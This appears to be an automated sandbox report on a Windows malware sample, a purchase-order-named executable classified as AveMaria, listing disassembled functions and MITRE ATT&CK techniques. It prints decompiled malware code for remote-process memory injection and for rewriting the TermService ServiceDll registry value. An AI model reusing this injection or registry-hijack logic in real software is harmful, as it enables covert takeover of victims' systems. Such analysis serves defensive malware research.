_memset.LIBCMT ref: 0469C6A1

Strings

0, xrefs: 0469C635

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: 0
API String ID: 2102423945-4108050209
Opcode ID: 0847723d0ff1223f644fca8a1f8c9343f8c07c9681b704ca6b1ca390cf065d6e
Instruction ID: e88167dff14aebb06d9694ff0af097693ebd5b3fd7bb5ba6eeae808bc8eb6860
Opcode Fuzzy Hash: 0847723d0ff1223f644fca8a1f8c9343f8c07c9681b704ca6b1ca390cf065d6e
Instruction Fuzzy Hash: DB5171B16043028FDB18CE18D89462AB7E9EB84314F14892DE896CB341F7B4FD55CB96

Uniqueness

Uniqueness Score: -1.00%

Function 046A65F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A67B0

Strings

database corruption at line %d of [%.10s], xrefs: 046A66C4
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A66BA

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1231421067
Opcode ID: ae4cf52efdaa8beacc6d84a7f805636b27cc4bf0dda7feda220d7ea0cd3a6792
Instruction ID: 93e2fb1edd7fcc9e0b25aab3b8f44cd6f501a0ee6e7942970ccd2e397a8e06df
Opcode Fuzzy Hash: ae4cf52efdaa8beacc6d84a7f805636b27cc4bf0dda7feda220d7ea0cd3a6792
Instruction Fuzzy Hash: EF51AC71A04A119BDB20DF28C444B16B7E5AF90718F1C856DE8988B342F7B5FCA5CF92

Uniqueness

Uniqueness Score: -1.00%

Function 046A3290, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A3396

Part of subcall function 0469D4E0: _memset.LIBCMT ref: 0469D514

Strings

database corruption at line %d of [%.10s], xrefs: 046A33AA, 046A3474
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A32EA, 046A33A0, 046A346A

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1231421067
Opcode ID: 837b5e0cc6279a2588e21aeeb9131c70dda062666218cd4c0d6b4b6cdd0904be
Instruction ID: 47480df56ba7bdbde188734ef30736e5660e55a80e41b61caa2cf9ef88ad12bd
Opcode Fuzzy Hash: 837b5e0cc6279a2588e21aeeb9131c70dda062666218cd4c0d6b4b6cdd0904be
Instruction Fuzzy Hash: 61514771B047419BD7208F298841A26B7E6EF94328F19855DEC598B381FB71FC92CF81

Uniqueness

Uniqueness Score: -1.00%

Function 046E9320, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046E93AE

Strings

misuse at line %d of [%.10s], xrefs: 046E9377
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046E936D

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$misuse at line %d of [%.10s]
API String ID: 2102423945-1850456636
Opcode ID: d87dd4f8e26e762e7cecd10ce2a8f73c8b86774ab2be6e9eda4434829965a0d0
Instruction ID: 264f572827c0337fce01653dbcc6b27daca370f497747c0aec7b467dee316c18
Opcode Fuzzy Hash: d87dd4f8e26e762e7cecd10ce2a8f73c8b86774ab2be6e9eda4434829965a0d0
Instruction Fuzzy Hash: 014115B0A01701EBEB15DF29D885BAAB7E8EF50309F044259E908CB382F775B954C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 046A36E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A3811

Strings

database corruption at line %d of [%.10s], xrefs: 046A382B, 046A384F, 046A3873
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A3821, 046A3845, 046A3869

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1231421067
Opcode ID: 99ffc5ad95213366a8cde7939b883ec26e6e258caec4736afdf3fb3838c56277
Instruction ID: ef3fa6f39579f87879150a30c576c7746f98f174d8f4c7c6becbadd7c2b543e6
Opcode Fuzzy Hash: 99ffc5ad95213366a8cde7939b883ec26e6e258caec4736afdf3fb3838c56277
Instruction Fuzzy Hash: 1351F6B1E002159BDB04CF98CC81ABEB7F4EF44305F1481ADE919A7381E775EA508BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0469F620, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0469F7BC

Strings

database corruption at line %d of [%.10s], xrefs: 0469F699
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 0469F68F

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1231421067
Opcode ID: 828df60137b0382ebef92c36623ad58421ac487a83edcb2db331f9ba672aa3ed
Instruction ID: 1b18bd89a97547c245d6766079a1b66cf931403af8209466ae68222de2ab313d
Opcode Fuzzy Hash: 828df60137b0382ebef92c36623ad58421ac487a83edcb2db331f9ba672aa3ed
Instruction Fuzzy Hash: 384117717043408BDB298F2898807563BEA9F95318F2545ADE888CF382F6B5ED46C795

Uniqueness

Uniqueness Score: -1.00%

Function 0469EEC0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

Strings

database corruption at line %d of [%.10s], xrefs: 0469EED6, 0469EFEA
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 0469EECC, 0469EFE0

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 0-1231421067
Opcode ID: dc90f973c31e0dde7fbcfc3d36cc8ebc1a873a44057bb9594167c9e23b2d6d58
Instruction ID: b28e1f7255ddac694d561aca2516f78cec6244381e4514682da5f4b2c780cfbc
Opcode Fuzzy Hash: dc90f973c31e0dde7fbcfc3d36cc8ebc1a873a44057bb9594167c9e23b2d6d58
Instruction Fuzzy Hash: AF41B1B1600700ABDB24DE24D840B2673EDAB94728F14855EE9598B381FBF2FC41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00407AF1, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00407AF1(intOrPtr __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long _t22;
				signed int _t23;
				intOrPtr _t31;
				void* _t32;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t49;
				signed int _t53;
				signed int _t60;

				_t43 = __ecx;
				_v8 = __edx;
				_v24 = __ecx;
				if( *0x419694 == 0) {
					 *0x419694 = E00408617() != 0;
				}
				_t22 = _a4;
				_t70 = _t22;
				if(_t22 == 0) {
					_t22 = E00407948(_t70);
				}
				_t23 = OpenProcess(0x1fffff, 0, _t22);
				_t60 = _t23;
				if(_t60 != 0) {
					_push(_t43);
					_push(_t43);
					_t44 = _t60;
					_t42 = E00408633(_t60, 0x100000, 0, 0);
					__eflags = _t42;
					if(_t42 != 0) {
						L8:
						_v12 = _v12 & 0x00000000;
						L0040878C(_t60, 0x100000, _t42, 0x100000, _t44,  &_v12);
						_t49 = E00408633(_t60, 0x100, 0x33370000, 0);
						_v20 = _t49;
						_v16 = 0x100;
						__eflags = _t49;
						if(_t49 != 0) {
							L11:
							_a4 = _a4 & 0x00000000;
							_t31 = E00408568(_t60, "XXXXXX", _v20, _v16, E00401133("XXXXXX"),  &_a4);
							__eflags = _t31;
							if(_t31 == 0) {
								L16:
								_push(0xfffffffd);
								L17:
								_pop(_t32);
								return _t32;
							}
							_t33 = E00401133("XXXXXX");
							__eflags = _a4 - _t33;
							if(_a4 != _t33) {
								goto L16;
							}
							_t58 = _v24;
							_a4 = _a4 & 0x00000000;
							_t53 = _t60;
							_t35 = E00408568(_t53, _v24, _t42, 0x100000, _v8,  &_a4);
							__eflags = _t35;
							if(_t35 == 0) {
								goto L16;
							}
							__eflags = _a4 - _v8;
							if(_a4 != _v8) {
								goto L16;
							}
							_push(_t53);
							_push(_t53);
							asm("cdq");
							return L004086E1(_t58, _t60, _t58, _t42, 0x100000);
						}
						__eflags = 0x100;
						if(0x100 != 0) {
							goto L11;
						}
						L10:
						_push(0xfffffffe);
						goto L17;
					}
					__eflags = 0x100000;
					if(0x100000 == 0) {
						goto L10;
					}
					goto L8;
				} else {
					return _t23 | 0xffffffff;
				}
			}

0x00407af1
0x00407b01
0x00407b04
0x00407b07
0x00407b10
0x00407b10
0x00407b17
0x00407b1a
0x00407b1c
0x00407b1e
0x00407b1e
0x00407b2c
0x00407b32
0x00407b36
0x00407b40
0x00407b41
0x00407b49
0x00407b50
0x00407b57
0x00407b59
0x00407b5f
0x00407b5f
0x00407b6c
0x00407b86
0x00407b8b
0x00407b90
0x00407b93
0x00407b95
0x00407b9f
0x00407b9f
0x00407bc0
0x00407bc8
0x00407bca
0x00407c15
0x00407c15
0x00407c17
0x00407c17
0x00000000
0x00407c17
0x00407bd1
0x00407bd7
0x00407bda
0x00000000
0x00000000
0x00407bdc
0x00407be2
0x00407be6
0x00407bee
0x00407bf6
0x00407bf8
0x00000000
0x00000000
0x00407bfd
0x00407c00
0x00000000
0x00000000
0x00407c02
0x00407c03
0x00407c07
0x00000000
0x00407c10
0x00407b97
0x00407b99
0x00000000
0x00000000
0x00407b9b
0x00407b9b
0x00000000
0x00407b9b
0x00407b5b
0x00407b5d
0x00000000
0x00000000
0x00000000
0x00407b38
0x00000000
0x00407b38

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,?,00402617,?,?), ref: 00407B2C

Part of subcall function 00408617: GetCurrentProcess.KERNEL32(00419698,00407A03,?,?,?,?), ref: 0040861C
Part of subcall function 00408617: IsWow64Process.KERNEL32(00000000), ref: 00408623
Part of subcall function 00408617: GetProcessHeap.KERNEL32 ref: 00408629

Strings

YYj, xrefs: 00407B71
XXXXXX, xrefs: 00407BA7, 00407BB6, 00407BCC

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentHeapOpenWow64
String ID: XXXXXX$YYj
API String ID: 1563638298-1957121946
Opcode ID: e401c90dc1eb9171c8b6cd42e689946692d9e3ad96f351f397a77a9d95864d86
Instruction ID: e5732774cbe7b056c6d1e26ea42a9f4b70b4e0c322beca2f04b95ba6d31a2942
Opcode Fuzzy Hash: e401c90dc1eb9171c8b6cd42e689946692d9e3ad96f351f397a77a9d95864d86
Instruction Fuzzy Hash: 7331EBB1E081057FFF149A658D41BBF76ACDB90398F20413FF914E62C1FA78AD4146AA

Uniqueness

Uniqueness Score: -1.00%

Function 046AD450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046AD488

Strings

out of memory, xrefs: 046AD4DB
unknown database %s, xrefs: 046AD4FA

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: out of memory$unknown database %s
API String ID: 2102423945-3235021497
Opcode ID: cb8761633e99c938563dceed4ab716c410859ac3f71bfc5628bc207bf4345edc
Instruction ID: 9da77b5ba5aeefb4f6e18bd482f60a4b5c4a7df310d17a89bc555c6af2d51d73
Opcode Fuzzy Hash: cb8761633e99c938563dceed4ab716c410859ac3f71bfc5628bc207bf4345edc
Instruction Fuzzy Hash: D421D77270021467EB00AA7DEC8196A73DDDB8561DF044169FD0CCB342F9A6FD1146D5

Uniqueness

Uniqueness Score: -1.00%

Function 046A0760, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046A07CE

Strings

database corruption at line %d of [%.10s], xrefs: 046A0838
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046A082E

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 2102423945-1231421067
Opcode ID: 029cdf08a3b4b3e0f6c8b5e2c60adc1cce79883bef82a60faa20b61074fe0f89
Instruction ID: c415b736cbcf93d5fe3e850b07de2e1ec428bd66092c446348c70a2d404d586c
Opcode Fuzzy Hash: 029cdf08a3b4b3e0f6c8b5e2c60adc1cce79883bef82a60faa20b61074fe0f89
Instruction Fuzzy Hash: AE210BB2F0060697EB109E6CD8416E977B9DF90714F14817DE9589B381F775FE128B80

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE1F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DE1F(void* __edx) {
				void* _v8;
				void* _v12;
				short* _v16;
				int _v20;
				char _v24;
				void* _t28;
				void* _t46;
				int _t48;

				_t46 = __edx;
				_v8 = 0;
				E004035E5( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v24 = 0;
				_v20 = 0;
				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
					L3:
					_t48 = 0;
				} else {
					_t28 = E00410FC3(_t46, E004035E5( &_v12, L"ServiceDll"),  &_v24);
					L00405EA5(_v12);
					if(_t28 != 0) {
						_t48 = E00403248(E00402ECF( &_v24,  &_v12), 0x54e054);
						L00405EA5(_v12);
						_v12 = 0;
					} else {
						E00410FAE( &_v8);
						goto L3;
					}
				}
				E00403036( &_v24);
				L00405EA5(_v16);
				E00410FAE( &_v8);
				return _t48;
			}

0x0040de1f
0x0040de31
0x0040de34
0x0040de3c
0x0040de49
0x0040de59
0x0040de8b
0x0040de8b
0x0040de5b
0x0040de70
0x0040de7a
0x0040de81
0x0040dec6
0x0040dec8
0x0040decd
0x0040de83
0x0040de86
0x00000000
0x0040de86
0x0040de81
0x0040de90
0x0040de98
0x0040dea0
0x0040deaa

APIs

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0054E020,?,?,0040E451,?,?), ref: 0040DE51

Part of subcall function 00410FC3: RegQueryValueExW.KERNEL32(?,74B60770,00000000,74B60770,00000000,00000000,?,00000000,00413589,?,?,?,004115B2,?,?,80000001), ref: 00410FE6
Part of subcall function 00410FC3: RegQueryValueExW.KERNEL32(?,74B60770,00000000,74B60770,00000000,00000000,?,004115B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0041100A

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?,?,0041112D,?,?,004136B9), ref: 00410FB8

Strings

ServiceDll, xrefs: 0040DE5F
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DE2C

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValuelstrlen$CloseDispatcherExceptionFreeOpenUserVirtual
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
API String ID: 1654648907-387424650
Opcode ID: f919aa991d001c6b3464f9c9eb3817998b56f5da9b2ae2365688dd067c5f474f
Instruction ID: 7ad04a792a366f4aa54ef19a0ec8d4b44cd364d9f3d079a0fce37a55fba9d951
Opcode Fuzzy Hash: f919aa991d001c6b3464f9c9eb3817998b56f5da9b2ae2365688dd067c5f474f
Instruction Fuzzy Hash: 37114C31D00108AACB24EBE6C956CEEBB79AF90704B10006FA801B72C1EB785F45CA94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9B6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D9B6(void* __ecx, void* __edx) {
				void* _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char _v28;
				char _v36;
				void* _t26;
				void* _t28;
				void* _t43;
				int _t44;
				void* _t45;

				_t43 = __edx;
				_t45 = __ecx;
				_t44 = 0;
				_v12 = 0;
				E004035E5( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v28 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
					_t26 = E00403221(_t45 + 0x34, _t43,  &_v36);
					_t28 = E00411039( &_v12, E004035E5( &_v16, L"ServiceDll"), _t26, 2);
					L00405EA5(_v16);
					_v16 = 0;
					E00403036( &_v36);
					E00410FAE( &_v12);
					if(_t28 != 0) {
						_t44 = 1;
					}
				}
				E00403036( &_v28);
				L00405EA5(_v20);
				E00410FAE( &_v12);
				return _t44;
			}

0x0040d9b6
0x0040d9be
0x0040d9c0
0x0040d9ca
0x0040d9cd
0x0040d9d5
0x0040d9e2
0x0040d9f2
0x0040d9fd
0x0040da14
0x0040da1e
0x0040da26
0x0040da29
0x0040da31
0x0040da38
0x0040da3a
0x0040da3a
0x0040da38
0x0040da3e
0x0040da46
0x0040da4e
0x0040da58

APIs

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D9EA

Part of subcall function 00411039: RegSetValueExW.ADVAPI32(?,74B60770,00000000,?,?,?,?,?,00411432,00000000,00000000,?,00000001,?,?,?), ref: 00411058

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?,?,0041112D,?,?,004136B9), ref: 00410FB8

Strings

ServiceDll, xrefs: 0040DA03
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D9C2

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CloseDispatcherExceptionFreeOpenUserValueVirtual
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
API String ID: 1557097135-387424650
Opcode ID: 46d6a864db22796e39573e448495aef1af00d4ccc217fabab50962eb0443194c
Instruction ID: 1a5d0307058eeef04090d9c41a954dd4ac33c1ebcd4837d1df6c387a7730c537
Opcode Fuzzy Hash: 46d6a864db22796e39573e448495aef1af00d4ccc217fabab50962eb0443194c
Instruction Fuzzy Hash: F2111F71D00118ABCB14EFA2CC96DEFBB79EF94704F40446FE502722D1EB786A85CA64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ADJUSTED PO3917NOV.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: AveMaria

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Exploits:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

